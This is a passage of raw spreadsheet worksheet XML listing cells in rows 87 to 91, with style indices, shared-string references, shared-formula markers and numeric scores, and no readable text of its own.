        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL87" s="78"/>
      <c r="AM87" s="78"/>
      <c r="AN87" s="78"/>
      <c r="AO87" s="78"/>
      <c r="AP87" s="80"/>
      <c r="AQ87" s="80"/>
      <c r="AR87" s="80"/>
      <c r="AS87" s="80">
        <v>0.0</v>
      </c>
      <c r="AT87" s="80"/>
      <c r="AU87" s="80"/>
      <c r="AV87" s="80"/>
      <c r="AW87" s="80"/>
      <c r="AX87" s="80"/>
      <c r="AY87" s="80"/>
      <c r="AZ87" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA87" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB87" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC87" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD87" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE87" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF87" s="82"/>
      <c r="BG87" s="82"/>
      <c r="BH87" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI87" s="82"/>
      <c r="BJ87" s="82"/>
      <c r="BK87" s="82"/>
      <c r="BL87" s="82"/>
      <c r="BM87" s="83"/>
      <c r="BN87" s="83"/>
      <c r="BO87" s="83"/>
      <c r="BP87" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ87" s="83"/>
      <c r="BR87" s="83"/>
      <c r="BS87" s="83"/>
      <c r="BT87" s="83"/>
      <c r="BU87" s="83"/>
      <c r="BV87" s="83"/>
      <c r="BW87" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX87" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY87" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ87" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA87" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB87" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC87" s="85"/>
      <c r="CD87" s="85"/>
      <c r="CE87" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF87" s="85"/>
      <c r="CG87" s="85"/>
      <c r="CH87" s="85"/>
      <c r="CI87" s="85"/>
      <c r="CJ87" s="86"/>
      <c r="CK87" s="86"/>
      <c r="CL87" s="86"/>
      <c r="CM87" s="86">
        <v>0.0</v>
      </c>
      <c r="CN87" s="86"/>
      <c r="CO87" s="86"/>
      <c r="CP87" s="86"/>
      <c r="CQ87" s="86"/>
      <c r="CR87" s="86"/>
      <c r="CS87" s="86"/>
      <c r="CT87" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU87" s="88" t="s">
        <v>941</v>
      </c>
      <c r="CV87" s="88">
        <v>3.0</v>
      </c>
      <c r="CW87" s="88">
        <v>2.0</v>
      </c>
      <c r="CX87" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY87" s="104">
        <v>2027768.0</v>
      </c>
      <c r="CZ87" s="104"/>
      <c r="DA87" s="104"/>
      <c r="DB87" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC87" s="104"/>
      <c r="DD87" s="104"/>
      <c r="DE87" s="104"/>
      <c r="DF87" s="104"/>
      <c r="DG87" s="89"/>
      <c r="DH87" s="89"/>
      <c r="DI87" s="89"/>
      <c r="DJ87" s="89">
        <v>1.0</v>
      </c>
      <c r="DK87" s="89"/>
      <c r="DL87" s="89"/>
      <c r="DM87" s="89"/>
      <c r="DN87" s="89"/>
      <c r="DO87" s="89"/>
      <c r="DP87" s="89"/>
      <c r="DQ87" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR87" s="91"/>
      <c r="DS87" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT87" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU87" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV87" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW87" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX87" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY87" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ87" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA87" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB87" s="74"/>
      <c r="EC87" s="74">
        <v>0.0</v>
      </c>
      <c r="ED87" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE87" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="88" ht="153.75" customHeight="1">
      <c r="B88" s="71" t="s">
        <v>351</v>
      </c>
      <c r="C88" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D88" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E88" s="72" t="s">
        <v>942</v>
      </c>
      <c r="F88" s="72" t="s">
        <v>943</v>
      </c>
      <c r="G88" s="72" t="s">
        <v>944</v>
      </c>
      <c r="H88" s="72" t="s">
        <v>945</v>
      </c>
      <c r="I88" s="73" t="s">
        <v>946</v>
      </c>
      <c r="J88" s="73" t="s">
        <v>947</v>
      </c>
      <c r="K88" s="73" t="s">
        <v>948</v>
      </c>
      <c r="L88" s="74">
        <v>9.0</v>
      </c>
      <c r="M88" s="74">
        <v>1.0</v>
      </c>
      <c r="N88" s="74">
        <v>1.0</v>
      </c>
      <c r="O88" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P88" s="74">
        <v>1.0</v>
      </c>
      <c r="Q88" s="74">
        <v>0.0</v>
      </c>
      <c r="R88" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S88" s="76" t="s">
        <v>949</v>
      </c>
      <c r="T88" s="76" t="s">
        <v>950</v>
      </c>
      <c r="U88" s="77" t="s">
        <v>951</v>
      </c>
      <c r="V88" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W88" s="109"/>
      <c r="X88" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y88" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z88" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA88" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB88" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC88" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD88" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE88" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF88" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG88" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH88" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI88" s="78"/>
      <c r="AJ88" s="78"/>
      <c r="AK88" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL88" s="78"/>
      <c r="AM88" s="78"/>
      <c r="AN88" s="78"/>
      <c r="AO88" s="78"/>
      <c r="AP88" s="80"/>
      <c r="AQ88" s="80"/>
      <c r="AR88" s="80"/>
      <c r="AS88" s="80">
        <v>0.0</v>
      </c>
      <c r="AT88" s="80"/>
      <c r="AU88" s="80"/>
      <c r="AV88" s="80"/>
      <c r="AW88" s="80"/>
      <c r="AX88" s="80"/>
      <c r="AY88" s="80"/>
      <c r="AZ88" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA88" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB88" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC88" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD88" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE88" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF88" s="82"/>
      <c r="BG88" s="82"/>
      <c r="BH88" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI88" s="82"/>
      <c r="BJ88" s="82"/>
      <c r="BK88" s="82"/>
      <c r="BL88" s="82"/>
      <c r="BM88" s="83"/>
      <c r="BN88" s="83"/>
      <c r="BO88" s="83"/>
      <c r="BP88" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ88" s="83"/>
      <c r="BR88" s="83"/>
      <c r="BS88" s="83"/>
      <c r="BT88" s="83"/>
      <c r="BU88" s="83"/>
      <c r="BV88" s="83"/>
      <c r="BW88" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX88" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY88" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ88" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA88" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB88" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC88" s="85"/>
      <c r="CD88" s="85"/>
      <c r="CE88" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF88" s="85"/>
      <c r="CG88" s="85"/>
      <c r="CH88" s="85"/>
      <c r="CI88" s="85"/>
      <c r="CJ88" s="86"/>
      <c r="CK88" s="86"/>
      <c r="CL88" s="86"/>
      <c r="CM88" s="86">
        <v>0.0</v>
      </c>
      <c r="CN88" s="86"/>
      <c r="CO88" s="86"/>
      <c r="CP88" s="86"/>
      <c r="CQ88" s="86"/>
      <c r="CR88" s="86"/>
      <c r="CS88" s="86"/>
      <c r="CT88" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU88" s="88" t="s">
        <v>149</v>
      </c>
      <c r="CV88" s="88">
        <v>2.0</v>
      </c>
      <c r="CW88" s="88">
        <v>2.0</v>
      </c>
      <c r="CX88" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY88" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ88" s="88"/>
      <c r="DA88" s="88"/>
      <c r="DB88" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC88" s="88"/>
      <c r="DD88" s="88"/>
      <c r="DE88" s="88"/>
      <c r="DF88" s="88"/>
      <c r="DG88" s="89"/>
      <c r="DH88" s="89"/>
      <c r="DI88" s="89"/>
      <c r="DJ88" s="89">
        <v>0.0</v>
      </c>
      <c r="DK88" s="89"/>
      <c r="DL88" s="89"/>
      <c r="DM88" s="89"/>
      <c r="DN88" s="89"/>
      <c r="DO88" s="89"/>
      <c r="DP88" s="89"/>
      <c r="DQ88" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR88" s="91"/>
      <c r="DS88" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT88" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU88" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV88" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW88" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX88" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY88" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ88" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA88" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB88" s="74"/>
      <c r="EC88" s="74">
        <v>0.0</v>
      </c>
      <c r="ED88" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE88" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="89" ht="153.75" customHeight="1">
      <c r="B89" s="71" t="s">
        <v>351</v>
      </c>
      <c r="C89" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D89" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E89" s="72" t="s">
        <v>952</v>
      </c>
      <c r="F89" s="72" t="s">
        <v>953</v>
      </c>
      <c r="G89" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H89" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I89" s="73" t="s">
        <v>954</v>
      </c>
      <c r="J89" s="73" t="s">
        <v>955</v>
      </c>
      <c r="K89" s="73" t="s">
        <v>956</v>
      </c>
      <c r="L89" s="74"/>
      <c r="M89" s="74">
        <v>1.0</v>
      </c>
      <c r="N89" s="74"/>
      <c r="O89" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P89" s="74">
        <v>1.0</v>
      </c>
      <c r="Q89" s="74">
        <v>0.0</v>
      </c>
      <c r="R89" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S89" s="112" t="s">
        <v>957</v>
      </c>
      <c r="T89" s="76" t="s">
        <v>958</v>
      </c>
      <c r="U89" s="77" t="s">
        <v>959</v>
      </c>
      <c r="V89" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W89" s="109"/>
      <c r="X89" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y89" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z89" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA89" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB89" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC89" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD89" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE89" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF89" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG89" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH89" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI89" s="78"/>
      <c r="AJ89" s="78"/>
      <c r="AK89" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL89" s="78"/>
      <c r="AM89" s="78"/>
      <c r="AN89" s="78"/>
      <c r="AO89" s="78"/>
      <c r="AP89" s="80"/>
      <c r="AQ89" s="80"/>
      <c r="AR89" s="80"/>
      <c r="AS89" s="80">
        <v>0.0</v>
      </c>
      <c r="AT89" s="80"/>
      <c r="AU89" s="80"/>
      <c r="AV89" s="80"/>
      <c r="AW89" s="80"/>
      <c r="AX89" s="80"/>
      <c r="AY89" s="80"/>
      <c r="AZ89" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA89" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB89" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC89" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD89" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE89" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF89" s="82"/>
      <c r="BG89" s="82"/>
      <c r="BH89" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI89" s="82"/>
      <c r="BJ89" s="82"/>
      <c r="BK89" s="82"/>
      <c r="BL89" s="82"/>
      <c r="BM89" s="83"/>
      <c r="BN89" s="83"/>
      <c r="BO89" s="83"/>
      <c r="BP89" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ89" s="83"/>
      <c r="BR89" s="83"/>
      <c r="BS89" s="83"/>
      <c r="BT89" s="83"/>
      <c r="BU89" s="83"/>
      <c r="BV89" s="83"/>
      <c r="BW89" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX89" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY89" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ89" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA89" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB89" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC89" s="85"/>
      <c r="CD89" s="85"/>
      <c r="CE89" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF89" s="85"/>
      <c r="CG89" s="85"/>
      <c r="CH89" s="85"/>
      <c r="CI89" s="85"/>
      <c r="CJ89" s="86"/>
      <c r="CK89" s="86"/>
      <c r="CL89" s="86"/>
      <c r="CM89" s="86">
        <v>0.0</v>
      </c>
      <c r="CN89" s="86"/>
      <c r="CO89" s="86"/>
      <c r="CP89" s="86"/>
      <c r="CQ89" s="86"/>
      <c r="CR89" s="86"/>
      <c r="CS89" s="86"/>
      <c r="CT89" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU89" s="88" t="s">
        <v>149</v>
      </c>
      <c r="CV89" s="88">
        <v>2.0</v>
      </c>
      <c r="CW89" s="88">
        <v>2.0</v>
      </c>
      <c r="CX89" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY89" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ89" s="88"/>
      <c r="DA89" s="88"/>
      <c r="DB89" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC89" s="88"/>
      <c r="DD89" s="88"/>
      <c r="DE89" s="88"/>
      <c r="DF89" s="88"/>
      <c r="DG89" s="89"/>
      <c r="DH89" s="89"/>
      <c r="DI89" s="89"/>
      <c r="DJ89" s="89">
        <v>0.0</v>
      </c>
      <c r="DK89" s="89"/>
      <c r="DL89" s="89"/>
      <c r="DM89" s="89"/>
      <c r="DN89" s="89"/>
      <c r="DO89" s="89"/>
      <c r="DP89" s="89"/>
      <c r="DQ89" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR89" s="91"/>
      <c r="DS89" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT89" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU89" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV89" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW89" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX89" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY89" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ89" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA89" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB89" s="74"/>
      <c r="EC89" s="74">
        <v>0.0</v>
      </c>
      <c r="ED89" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE89" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="90" ht="153.75" customHeight="1">
      <c r="B90" s="71" t="s">
        <v>351</v>
      </c>
      <c r="C90" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D90" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E90" s="72" t="s">
        <v>952</v>
      </c>
      <c r="F90" s="72" t="s">
        <v>953</v>
      </c>
      <c r="G90" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H90" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I90" s="73" t="s">
        <v>954</v>
      </c>
      <c r="J90" s="73" t="s">
        <v>955</v>
      </c>
      <c r="K90" s="73" t="s">
        <v>960</v>
      </c>
      <c r="L90" s="74"/>
      <c r="M90" s="74">
        <v>1.0</v>
      </c>
      <c r="N90" s="74"/>
      <c r="O90" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P90" s="74">
        <v>1.0</v>
      </c>
      <c r="Q90" s="74">
        <v>0.0</v>
      </c>
      <c r="R90" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S90" s="112" t="s">
        <v>957</v>
      </c>
      <c r="T90" s="76" t="s">
        <v>958</v>
      </c>
      <c r="U90" s="77" t="s">
        <v>959</v>
      </c>
      <c r="V90" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W90" s="109"/>
      <c r="X90" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y90" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z90" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA90" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB90" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC90" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD90" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE90" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF90" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG90" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH90" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI90" s="78"/>
      <c r="AJ90" s="78"/>
      <c r="AK90" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL90" s="78"/>
      <c r="AM90" s="78"/>
      <c r="AN90" s="78"/>
      <c r="AO90" s="78"/>
      <c r="AP90" s="80"/>
      <c r="AQ90" s="80"/>
      <c r="AR90" s="80"/>
      <c r="AS90" s="80">
        <v>0.0</v>
      </c>
      <c r="AT90" s="80"/>
      <c r="AU90" s="80"/>
      <c r="AV90" s="80"/>
      <c r="AW90" s="80"/>
      <c r="AX90" s="80"/>
      <c r="AY90" s="80"/>
      <c r="AZ90" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA90" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB90" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC90" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD90" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE90" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF90" s="82"/>
      <c r="BG90" s="82"/>
      <c r="BH90" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI90" s="82"/>
      <c r="BJ90" s="82"/>
      <c r="BK90" s="82"/>
      <c r="BL90" s="82"/>
      <c r="BM90" s="83"/>
      <c r="BN90" s="83"/>
      <c r="BO90" s="83"/>
      <c r="BP90" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ90" s="83"/>
      <c r="BR90" s="83"/>
      <c r="BS90" s="83"/>
      <c r="BT90" s="83"/>
      <c r="BU90" s="83"/>
      <c r="BV90" s="83"/>
      <c r="BW90" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX90" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY90" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ90" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA90" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB90" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC90" s="85"/>
      <c r="CD90" s="85"/>
      <c r="CE90" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF90" s="85"/>
      <c r="CG90" s="85"/>
      <c r="CH90" s="85"/>
      <c r="CI90" s="85"/>
      <c r="CJ90" s="86"/>
      <c r="CK90" s="86"/>
      <c r="CL90" s="86"/>
      <c r="CM90" s="86">
        <v>0.0</v>
      </c>
      <c r="CN90" s="86"/>
      <c r="CO90" s="86"/>
      <c r="CP90" s="86"/>
      <c r="CQ90" s="86"/>
      <c r="CR90" s="86"/>
      <c r="CS90" s="86"/>
      <c r="CT90" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU90" s="88" t="s">
        <v>149</v>
      </c>
      <c r="CV90" s="88">
        <v>2.0</v>
      </c>
      <c r="CW90" s="88">
        <v>2.0</v>
      </c>
      <c r="CX90" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY90" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ90" s="88"/>
      <c r="DA90" s="88"/>
      <c r="DB90" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC90" s="88"/>
      <c r="DD90" s="88"/>
      <c r="DE90" s="88"/>
      <c r="DF90" s="88"/>
      <c r="DG90" s="89"/>
      <c r="DH90" s="89"/>
      <c r="DI90" s="89"/>
      <c r="DJ90" s="89">
        <v>0.0</v>
      </c>
      <c r="DK90" s="89"/>
      <c r="DL90" s="89"/>
      <c r="DM90" s="89"/>
      <c r="DN90" s="89"/>
      <c r="DO90" s="89"/>
      <c r="DP90" s="89"/>
      <c r="DQ90" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR90" s="91"/>
      <c r="DS90" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT90" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU90" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV90" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW90" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX90" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY90" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ90" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA90" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB90" s="74"/>
      <c r="EC90" s="74">
        <v>0.0</v>
      </c>
      <c r="ED90" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE90" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="91" ht="153.75" customHeight="1">
      <c r="B91" s="71" t="s">
        <v>351</v>
      </c>
      <c r="C91" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D91" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E91" s="72" t="s">
        <v>961</v>
      </c>
      <c r="F91" s="72" t="s">
        <v>962</v>
      </c>
      <c r="G91" s="72" t="s">
        <v>963</v>
      </c>
      <c r="H91" s="72" t="s">
        <v>964</v>
      </c>
      <c r="I91" s="73" t="s">
        <v>965</v>
      </c>
      <c r="J91" s="73" t="s">
        <v>966</v>
      </c>
      <c r="K91" s="73" t="s">
        <v>967</v>
      </c>
      <c r="L91" s="74">
        <v>264.0</v>
      </c>
      <c r="M91" s="74">
        <v>1.0</v>
      </c>
      <c r="N91" s="74">
        <v>1.0</v>
      </c>
      <c r="O91" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P91" s="74">
        <v>1.0</v>
      </c>
      <c r="Q91" s="74">
        <v>0.0</v>
      </c>
      <c r="R91" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S91" s="76" t="s">
        <v>968</v>
      </c>
      <c r="T91" s="76" t="s">
        <v>969</v>
      </c>
      <c r="U91" s="77" t="s">
        <v>970</v>
      </c>
      <c r="V91" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W91" s="109"/>
      <c r="X91" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y91" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z91" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA91" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB91" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC91" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD91" s="78" t="s">
        <v>971</v>
      </c>
      <c r="AE91" s="78">
        <v>4.0</v>
      </c>
      <c r="AF91" s="78">
        <v>20.0</v>
      </c>
      <c r="AG91" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH91" s="78" t="s">
        <v>971</v>
      </c>
      <c r="AI91" s="78"/>
      <c r="AJ91" s="78"/>
      <c r="AK91" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL91" s="78"/>
      <c r="AM91" s="78"/>
      <c r="AN91" s="78"/>
      <c r="AO91" s="78"/>
      <c r="AP91" s="80"/>
      <c r="AQ91" s="80"/>
      <c r="AR91" s="80"/>
      <c r="AS91" s="80">
        <v>0.0</v>
      </c>
      <c r="AT91" s="80"/>
      <c r="AU91" s="80"/>
      <c r="AV91" s="80"/>
      <c r="AW91" s="80"/>
      <c r="AX91" s="80"/>
      <c r="AY91" s="80"/>
      <c r="AZ91" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA91" s="82" t="s">
        <v>972</v>
      </c>
      <c r="BB91" s="82">
        <v>5.0</v>
      </c>
      <c r="BC91" s="82">
        <v>25.0</v>
      </c>
      <c r="BD91" s="79">
        <v>2100366.0</v>
      </c>
      <c r="BE91" s="82" t="s">
        <v>971</v>
      </c>
      <c r="BF91" s="82"/>
      <c r="BG91" s="82"/>
      <c r="BH91" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI91" s="82"/>
      <c r="BJ91" s="82"/>
      <c r="BK91" s="82"/>
      <c r="BL91" s="82"/>
      <c r="BM91" s="83"/>
      <c r="BN91" s="83"/>
      <c r="BO91" s="83"/>
      <c r="BP91" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ91" s="83"/>
      <c r="BR91" s="83"/>
      <c r="BS91" s="83"/>
      <c r="BT91" s="83"/>
      <c r="BU91" s="83"/>
      <c r="BV91" s="83"/>
      <c r="BW91" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX91" s="85" t="s">
        <v>972</v>
      </c>
      <c r="BY91" s="85">
        <v>5.0</v>
      </c>
      <c r="BZ91" s="85">
        <v>45.0</v>
      </c>
      <c r="CA91" s="79">
        <v>2100366.0</v>
      </c>
      <c r="CB91" s="85" t="s">
        <v>971</v>
      </c>
      <c r="CC91" s="85"/>
      <c r="CD91" s="85"/>
      <c r="CE91" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF91" s="85"/>
      <c r="CG91" s="85"/>
      <c r="CH91" s="85"/>
      <c r="CI91" s="85"/>
      <c r="CJ91" s="86"/>
      <c r="CK91" s="86"/>
      <c r="CL91" s="86"/>
      <c r="CM91" s="86">
        <v>0.0</v>
      </c>
      <c r="CN91" s="86"/>
      <c r="CO91" s="86"/>
      <c r="CP91" s="86"/>
      <c r="CQ91" s="86"/>
      <c r="CR91" s="86"/>
      <c r="CS91" s="86"/>
      <c r="CT91" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU91" s="88" t="s">
        <v>973</v>
      </c>
      <c r="CV91" s="88">
        <v>9.0</v>
      </c>
      <c r="CW91" s="88">
        <v>63.0</v>
      </c>
      <c r="CX91" s="79" t="s">
        <v>974</v>
      </c>
      <c r="CY91" s="88" t="s">
        <v>971</v>
      </c>
